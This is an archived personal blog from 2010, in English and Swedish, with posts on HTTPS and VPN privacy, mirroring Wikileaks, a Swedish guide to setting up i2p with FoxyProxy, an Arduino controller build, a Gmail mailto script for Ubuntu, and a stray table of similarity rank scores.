The easiest way to avoid having your information stolen is to use the “https://”- address instead of the “http://”- address to the website you are logging in to. There is a handy "Firefox Plugin”:https://www.eff.org/https-everywhere to help you with this!
To make sure all of your network traffic is encrypted when you are using a wireless network you can use a VPN, Virtual Private Network. This will tell your computer to send all information that is leaving your computer to first go to another computer that you trust and from that computer travel to the website/chat-server you have requested. You can either install a VPN at home, but that might get a bit complicated, or you can rent the service from a VPN provider. There are a lot of alternatives, examples are Anonine and Relakks (both are Swedish).
A VPN might also help to protect your identity on the web!

Support Our Troops

2010-12-05T00:00:00+01:00

Support Our Troops

05 Dec 2010



“I can’t belive we are sitting here and sharing information on 
what IP-adresses are stil not censored.” – @kyrah

This is how you mirror Wikileaks and help supporting Freedom of Speech.

On a Linux/Unix machine write the command “wget -mirror 46.59.1.2” and you will copy the website to your local machine. It is not guarranteed that the ip will work, and if it doesn’t check out this list of wikileak mirrors to get a new one failar.nu/mirrorlist.html or log in to irc.telecomix.org and the channel #telekompaketet and ask them for an IP-adress.

Update Wikileaks just put up a guide on how to help mirroring their website here.

Hur man gör för att surfa på i2p hemsidor

2010-12-03T00:00:00+01:00

Hur man gör för att surfa på i2p hemsidor

3 Dec 2010

A guide in Swedish on how to connect to the i2p Darknet.
I’ve decided to write this in Swedish since I guess there are alot of tutorials for this on English already. If you are unable to find one then try using Google Translate.

Har du sprungit på hemsidor som slutar på “.i2p”, som t.ex. http://forum.i2p/?
Dessa hemsidor går inte att öppna normalt i en webläsare och det beror på att de är såkallade “eepSites”. Dessa sidorna ligger inne i ett “Darknet” som möjliggör för den som lägger upp hemsidan och för de som besöker hemsidan att vara anonyma.
Om du vill besöka en hemsida i i2p eller lägga upp en anonym hemsida så kan du följa stegen nedan. Märk dock att jag kör Linux distributionen Ubuntu 10.10 och om du kör något annat Operativsystem (som t.ex Apples OS X eller Windows) så kan det se lite annorlunda ut men jag försöker hålla det så allmänt som jag kan.

Här är en video där jag utför alla stegen som står nedanför på en nyinstallerad Ubuntu maskin (utom java installationen).
För tillfället är den helt oklippt då jag inte har haft tid till det ännu och då jag kör den i en virtuell maskin så går vissa nedladdningar ganska slött. Spola gärna förbi dem tills jag har fått tid att klippa till filmen och ladda upp den här ordentligt.

Det första steget är att se till att du har Java installerat på din dator. Det är lätt att göra på de flesta operativsystem. Surfa in på den här hemsidan och testa om du har det eller inte. Om du saknar det så kan du lätt installera det från hemsidan.
Det andra steget är att surfa in på i2p-projektets egen hemsida och ladda ner den senaste versionen av i2p-installeringsfilen. Hemsidan hittar ni här och filen ni skall ladda ner ligger under rubriken “Clean installer:” och “Graphical installer:” Filen heter något i stil med “i2pinstall_*...exe” där “*” versions nummer.
Nu skiljer det sig lite mellan operativsystemen. Om du kör Windows kan du troligen bara trycka på filen för att få upp en installationsruta (Ni kan sen hoppa direkt till nästa punkt). Kör du OS X eller Linux som jag så får du öppna en Terminal och navigera dig till mappen där filen ligger med hjälp av kommandona “ls” (se vad som finns i mappen) och “cd dir” (gå till en mapp) där “dir” är mappens namn. När du väl är i samma mapp som installationsfilen så skriv in commandot
```
$ java -jar i2pinstall_*...exe
```
där du får byta ut “*”-tecknen mot versionsnumret på din fil.
När du har utfört ovanstående steg öppnas en lättförstålig ruta som låter dig välja vilket språk du vill installera med samt vilken mapp du vill installera i. Följ de angivna stegen i rutan tills den säger att du är klar.
Nu är det dags att starta din i2p-router. Det är den som låter dig ansluta till de anonyma i2p sidorna.
Nu vet jag inte hur du gör detta på en Windowsmaskin (om någon som läser detta vet hur man gör får ni gärna berätta så jag kan uppdatera guiden), men antagligen skall ni klicka på filen “i2prouter” i er installationsmapp.
Linux och OS X användare kan göra såhär: Öppna åter igen en terminal och navigera er in till mappen som ni angav som installationmapp, på Ubuntu så är standardmappen “/home/user/i2p/”. Väl inne i mappen så skriver ni
```
$ ./i2prouter start
```
och detta bör resultera i en output som liknar
```
$ Starting i2p Service… 
```
Om allt har gått bra i föregående steg skall nu en webläsare öppnas som visar din i2p-inställningspanel. Ha lite tålamod för det kan ta en liten stund. Här kan du sköta alla dina inställningar och läsa mer om hur du gör för att chatta anonymt och säkert, lägga upp anonyma hemsidor och mycket mera. Den här sidan har många små inställningar att göra men jag tänkte inte gå igenom dem just nu för all information finns där på lättförstålig svenska. Man behöver inte heller röra inställningarna för att det skall fungera normalt heller.
Nu för att kunna surfa på i2p-hemsidorna så måste vi öppna en webbläsare. Vi måste få webbläsaren att använda adressen “localhost” och porten “4444” som proxy för att koppla upp sig på internet. Detta kanske låter lite avancerat men det är förvånansvärt lätt i de flesta moderna webbläsare och görs oftast i inställningarna.
För att göra detta så lätt som möjligt föreslår jag att ni använder webbläsaren Firefox (som ni kan hämta här). För Firefox har nämligen en väldigt smidig “addon”, tillägg, som gör att man slipper gå in och ändra proxyinställningarna varje gång man vill besöka en i2p-hemsida.
Tillägget heter FoxyProxy och går att installera genom att man öppnar Firefox och trycker på “Verktyg” i menyraden och sedan på “Tilläg”. Sök, i sökrutan högst upp, på “FoxyProxy” och installera sedan “FoxyProxy Standard”. Detta tar en liten stund och sedan blir du ombedd att starta om Firefox. Gör det! :)
När firefox startar igen har det dykt upp en liten ikon längst ner i högra hörnet. Tryck på den.
I rutan som öppnas trycker ställer du nu på “Lägg till ny proxy”. Det kommer nu öppnas ytterligare en ruta. I den stora textrutan som det står “Host eller ipadress” brevid så skriver du in “localhost”. I den mindre rutan som det står “Port” på så skriver du in “4444”.
Nästa steg är att välja fliken “URL-mönster”. Tryck knappen “Lägg till nytt mönster”. Döp mönstret till “i2p” och i “URL eller URL-mönster”-rutan så skriver du in "*.i2p*". Det betyder att FoxyProxy endast skall köra sidor som innehåller texten “.i2p” genom i2p-nätverket. Tryck sedan “Ok” för att spara ditt mönster och tryck sedan “Ok” för att spara din proxy.

Sista steget är nu att ändra högst upp i rutan från “Stäng av FoxyProx för användning” till “Använd Proxy enligt fördefinierade mönster och prioritet”.
Nu är det dags för att se om alltid har fungerat som det skall! Testa att gå in på den här länken: forum.i2p. Fungerar det? Grattis du kan nu surfa till annonyma i2p-sidor (eepSites)!

Varför jag rekommenderar FoxyProxy är för att man inte skall behöva ändra för hand varje gång man vill byta mellan att surfa över i2p och surfa direkt över sin internetuppkoppling. Det finns säkert massor av alternativ som liknar FoxyProxy till både Firefox och alla andra webbläsare men jag rekommendera FoxyProxy just för att jag har testat det och vet att det fungerar väldigt bra.
Värt att nämna är också att man kan surfa genom i2p till vanliga hemsidor med, som t.ex. www.google.se och får även då sin IP-adress dold (MEN DÅ MÅSTE NI ÄNDRA I FOXYPROXY SÅ NI ALLTID ANVÄNDER ER “localhost” PORT “4444” PROXY). Tyvärr går detta väldigt långsamt då “utvägarna” ur i2p-nätverket är få. I2p är inte tänkt att ha “utvägar” egentligen så om du egentligen vill surfa på det “vanliga” nätet och vill vara annonym kan du t.ex. testa TOR som är en liknande tjänst men som mer riktar sig till att annonymisera ip-adresser på det vanliga nätet. Hur man ansluter sig till TOR är en annan historia och jag kanske skriver en guide till det en annan dag.

Många väljer att använda två webläsare, en där de surfar genom i2p och en där de surfar på vanliga webben. Detta beror på att många addons och script kan läcka information om dig. Därför är det säkrast att använda två webläsare om man är mån om att vara anonym.

Nu när i2p fungerar bör ni hoppa tillbaka till er inställningspanel och se så att allt fungerar bra. Klicka runt lite och se hur saker fungerar. Om du inte har vidarbefodra en port i din router till i2p kan det t.ex stå en varning. Följ bara instruktionerna i felmedelandena så löser sig allt sådant.

svenskarollspel.se added i2p and https support

2010-11-28T00:00:00+01:00

svenskarollspel.se added i2p and https support

28 Nov 2010

As a hobby project and as a favor to the swedish roleplaying industri I am hosting the website svenskarollspel.se. The website targets people who are interested to see what Swedish RPGs are available on the market. It is meant as a simple place to start if you are new to roleplaying games.
The website is still under heavy construction but I am writing about it here because I just added HTTPS and i2p support.

The SSL- certificate is signed with by startssl and it is a free service!

I have also started to host the site on the i2p darknet. This might not be something that is needed for an RPG website but I did it more as a statement as I am a strong believer in the right to anonymity and freedom of speech

I hope to be able to provide the same services for this blog as well within a near future.

This blogpost will be extended later, because right now I have a Realtime programming project to finish.

Built an arduino-snes-usb-handcontroller

2010-11-09T00:00:00+01:00

Built an arduino-snes-usb-handcontroller

09 Nov 2010

Today I finished moulding my Arduino “snes”-handcontroller (usb).

I used mostly parts from sparkfun, like the thumstick, and the red board. The microcontroller controlling everything is an Arduino Duemilanove. The rest of the components (mostly buttons) I scrambled together from different locations.

My plan is to write some little arcade game to control with it, but as I just finished the assembly I just tried out some of the example code on SparkFuns website. Here is my microcontroller singing “Twinkle, twinkle little star” in different speeds and intensities (in html 5 so not sure if it is going to work for all of you. In case it doesn’t work here is a direct link to this rather unspectacular film).

Moving in

2010-11-09T00:00:00+01:00

Moving in

14 Jul 2010

I just decided to move from my wordpress blog over at development.kejsarmakten.se to a more personal blog less connected to the Kejsarmakten project. This blog is hosted with the help of Jekyll. The current design of this site is merly temporary. I will also try to migrate parts of my old blog here in due time.

How to open mailto: with gmail in chrome

2010-06-19T00:00:00+02:00

How to open mailto: with gmail in chrome

19 Jun 2010

I use Gmail as my main e-mail client so I grew rather tired of having Thunderbird (or Evolution Mail) open every time I press a mailto-tag in Chrome on my Ubuntu (10.04 LTS) machine. This is how you get Gmail instead of your standard email client.
First you need to open a terminal and write

$	gnome-default-applications-properties

In the newly opened window set the email command to

gnome-open https://mail.google.com/mail/?extsrc=mailto&url=%s

Do not forget to set Chrome as your default browser.

—

You can get the email to be automatically filled out by for you if you change the email command in gnome-default-applications-properties to

$		sh /home/user/gmailinchrome.sh %s

(where “user” should be replaced by your username). Then you have to put a shell-script in your /home folder. This is done by creating a file named gmailinchrome.sh in your home folder and copying the following text into the file.

#!/bin/sh
/opt/google/chrome/google-chrome 
“https://mail.google.com/mail?view=cm&tf=0&to=`echo $1 | sed ‘s/mailto://’`”

Similarity function	Rankscore
Euclidian distance	0.171801575012
Euclidian distance (weighted)	0.177710916698
Tanimoto Coefficient	0.129399988285
Cosine similarity	0.179036040926
Cosine similarity (weighted)	0.212398453763